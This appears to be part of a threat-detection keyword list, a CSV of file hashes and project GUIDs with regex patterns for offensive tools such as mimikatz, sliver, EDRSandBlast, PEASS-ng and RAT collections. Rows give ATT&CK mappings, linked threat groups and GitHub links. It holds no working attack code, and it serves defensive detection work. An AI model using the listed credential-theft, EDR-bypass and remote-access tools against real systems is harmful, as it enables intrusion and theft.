"*04DD48A0AFD6D6EA2969225DE9DDEF69EDB3DBC1D8C1AED2C4F12E9621C948F1*",".{0,1000}04DD48A0AFD6D6EA2969225DE9DDEF69EDB3DBC1D8C1AED2C4F12E9621C948F1.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","21011"
"*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*",".{0,1000}04DFB6E4\-809E\-4C35\-88A1\-2CC5F1EBFEBD.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","#GUIDproject","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","21012"
"*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*",".{0,1000}04DFB6E4\-809E\-4C35\-88A1\-2CC5F1EBFEBD.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","#GUIDproject","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","21013"
"*04e6af8c093849416d46aa2d45c30bdf3501676621c43d15e7200f219c580c55*",".{0,1000}04e6af8c093849416d46aa2d45c30bdf3501676621c43d15e7200f219c580c55.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","21015"
"*04E8D9E98A7BAF3AFBA44E9FCFF34659979ED27AC3AE92EE2184F5963F339E32*",".{0,1000}04E8D9E98A7BAF3AFBA44E9FCFF34659979ED27AC3AE92EE2184F5963F339E32.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","21016"
"*04eb0f500553c9d58de8f5a8bb102cba7dcb0d1e9a77baa4227237c49a5e81d8*",".{0,1000}04eb0f500553c9d58de8f5a8bb102cba7dcb0d1e9a77baa4227237c49a5e81d8.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","#filehash","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","21017"
"*04f2d08d79da097f7783031a57aa6685e5bdbe7589dcdbff724df1d9bad41d53*",".{0,1000}04f2d08d79da097f7783031a57aa6685e5bdbe7589dcdbff724df1d9bad41d53.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21019"
"*04FC654C-D89A-44F9-9E34-6D95CE152E9D*",".{0,1000}04FC654C\-D89A\-44F9\-9E34\-6D95CE152E9D.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","21020"
"*050243af07ab26ee16ed59f35a1d7944db273a40aba1c3e70438c3a8e0d2a923*",".{0,1000}050243af07ab26ee16ed59f35a1d7944db273a40aba1c3e70438c3a8e0d2a923.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","1","0","#filehash","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","21022"
"*05043d8400b0be454879f8d7f4c4455afa7ef1c9705176d1d95334f36e84bd53*",".{0,1000}05043d8400b0be454879f8d7f4c4455afa7ef1c9705176d1d95334f36e84bd53.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","21023"
"*050720C033870D6BC6D8138D662A3AC0AC5B07858A428C594F81B7B1B55AB963*",".{0,1000}050720C033870D6BC6D8138D662A3AC0AC5B07858A428C594F81B7B1B55AB963.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","21024"
"*050c8a0def9c19dbc64296f5a4834a902756ed06a740bdc7e0170a8748792bd5*",".{0,1000}050c8a0def9c19dbc64296f5a4834a902756ed06a740bdc7e0170a8748792bd5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21025"
"*050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23*",".{0,1000}050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21026"
"*050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23*",".{0,1000}050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21027"
"*050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23*",".{0,1000}050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21028"
"*050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23*",".{0,1000}050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21029"
"*050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23*",".{0,1000}050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21030"
"*050dcd051a109b6bd8804e769242ec4e1c087bdd2fb45880c2affeebb630cf77*",".{0,1000}050dcd051a109b6bd8804e769242ec4e1c087bdd2fb45880c2affeebb630cf77.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","21031"
"*051597cb4fc84251a039fe931235dc5e418a20a290e90f91fa4ffc974108bb0e*",".{0,1000}051597cb4fc84251a039fe931235dc5e418a20a290e90f91fa4ffc974108bb0e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21033"
"*051b9812bd48685cd19ba31247a3cb50a845bb902feae2433ff1fd8840a6e520*",".{0,1000}051b9812bd48685cd19ba31247a3cb50a845bb902feae2433ff1fd8840a6e520.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","21034"
"*051d5f7fb8c577932d243da40e744e1e228d5f1b89c83613aa4e8a8ad5ee6b98*",".{0,1000}051d5f7fb8c577932d243da40e744e1e228d5f1b89c83613aa4e8a8ad5ee6b98.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","21035"
"*052083681fa05830137dd07aa3778d52a98dca541c725a0cffccde43a14fed89*",".{0,1000}052083681fa05830137dd07aa3778d52a98dca541c725a0cffccde43a14fed89.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21036"
"*0527a14f-1591-4d94-943e-d6d784a50549*",".{0,1000}0527a14f\-1591\-4d94\-943e\-d6d784a50549.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","#GUIDproject","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","21039"
"*052C26C0-7979-4555-89CE-34C5CE8D8B34*",".{0,1000}052C26C0\-7979\-4555\-89CE\-34C5CE8D8B34.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT  Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","TA2541 - APT-C-36","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","#GUIDproject","N/A","10","10","92","39","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z","21040"
"*0538b3096657777e14c5ac6296037b936df7fb375d32199b0ae1b7fe33b3d63b*",".{0,1000}0538b3096657777e14c5ac6296037b936df7fb375d32199b0ae1b7fe33b3d63b.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#filehash","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","21041"
"*053c976a6b035d2c3daefe986d293fcb1d92ffd0f535a649ee61218c66721555*",".{0,1000}053c976a6b035d2c3daefe986d293fcb1d92ffd0f535a649ee61218c66721555.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","21042"
"*053e66e29158b7d72fcce76e452dff8b1b5cbeb90f40ddca171a1ddf88c14fef*",".{0,1000}053e66e29158b7d72fcce76e452dff8b1b5cbeb90f40ddca171a1ddf88c14fef.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21043"
"*054f6b13f3cf2ca61c08262584bca599685344bf74979f7806da6351d5a1e4ec*",".{0,1000}054f6b13f3cf2ca61c08262584bca599685344bf74979f7806da6351d5a1e4ec.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21045"
"*0556d3a1e4719382613891895582f8a392ccacfab6814bc9deafa9c99c86e553*",".{0,1000}0556d3a1e4719382613891895582f8a392ccacfab6814bc9deafa9c99c86e553.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#filehash","N/A","8","1","N/A","N/A","N/A","N/A","21047"
"*055BC73F-FCAE-4361-B035-2E156A101EA9*",".{0,1000}055BC73F\-FCAE\-4361\-B035\-2E156A101EA9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","21048"
"*055d93807dbb92adac4bfd63349ac634e7a214712115656f00d9a1750d98da52*",".{0,1000}055d93807dbb92adac4bfd63349ac634e7a214712115656f00d9a1750d98da52.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","21049"
"*056a00cd961e5d38f464d6a15393c92f3f0cef668e396f9595822e7147b4c25e*",".{0,1000}056a00cd961e5d38f464d6a15393c92f3f0cef668e396f9595822e7147b4c25e.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","21050"
"*05703420a4694ddc3d737d5f7dd589ff1288b05fec2bdc6f5b0f1227509429f9*",".{0,1000}05703420a4694ddc3d737d5f7dd589ff1288b05fec2bdc6f5b0f1227509429f9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21051"
"*057432add809186a039ba449a5988101aad9f9e55119b90e34b49e9f14835b3a*",".{0,1000}057432add809186a039ba449a5988101aad9f9e55119b90e34b49e9f14835b3a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21052"
"*05776513007563031e633e1e5820914bfdcac5df19fe7fc93be680df32f75362*",".{0,1000}05776513007563031e633e1e5820914bfdcac5df19fe7fc93be680df32f75362.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21054"
"*057be14a7e848f100a489cc66a10416ffa70af9752745f95fa56c6df73c35d27*",".{0,1000}057be14a7e848f100a489cc66a10416ffa70af9752745f95fa56c6df73c35d27.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21055"
"*057e9cb126eccb5bc86dfd9d8b816ae77456987742f68d19eedcd4e3299ab217*",".{0,1000}057e9cb126eccb5bc86dfd9d8b816ae77456987742f68d19eedcd4e3299ab217.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21056"
"*05842de51ede327c0f55df963f6de4e32ab88f43a73b9e0e1d827bc70199eff0*",".{0,1000}05842de51ede327c0f55df963f6de4e32ab88f43a73b9e0e1d827bc70199eff0.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21058"
"*05842de51ede327c0f55df963f6de4e32ab88f43a73b9e0e1d827bc70199eff0*",".{0,1000}05842de51ede327c0f55df963f6de4e32ab88f43a73b9e0e1d827bc70199eff0.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21059"
"*058e00b9037854fd3a606bfaaf65c5705b21731acba25278bbe5138b5c736abd*",".{0,1000}058e00b9037854fd3a606bfaaf65c5705b21731acba25278bbe5138b5c736abd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21062"
"*0592164ed8c8e6330431ba1f8a3eeee650af93d11b4320cfcfda75483b699c32*",".{0,1000}0592164ed8c8e6330431ba1f8a3eeee650af93d11b4320cfcfda75483b699c32.{0,1000}","offensive_tool_keyword","Invoke-GrabTheHash","Get the NTLM Hash for the User or Machine Account TGT held in your current session","T1558.004 - T1003.004","TA0006","N/A","N/A","Credential Access","https://github.com/Leo4j/Invoke-GrabTheHash","1","0","#filehash","N/A","8","1","6","1","2023-10-26T10:52:51Z","2023-08-22T12:14:53Z","21063"
"*0599c7537d4b728cd234412440a11a6cc54297b3c7af59c1d0309850aca0da53*",".{0,1000}0599c7537d4b728cd234412440a11a6cc54297b3c7af59c1d0309850aca0da53.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21064"
"*05a14a7d41f84d5169b1bf7375c19f58543c78cc4e97215fbfbe46f45acdc3bd*",".{0,1000}05a14a7d41f84d5169b1bf7375c19f58543c78cc4e97215fbfbe46f45acdc3bd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21066"
"*05acf5d2a8e06af036dc6e434e540814a8632c7a81601f912092f8b2f12c6ed3*",".{0,1000}05acf5d2a8e06af036dc6e434e540814a8632c7a81601f912092f8b2f12c6ed3.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21068"
"*05B4EB7F-3D59-4E6A-A7BC-7C1241578CA7*",".{0,1000}05B4EB7F\-3D59\-4E6A\-A7BC\-7C1241578CA7.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#GUIDproject","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","21069"
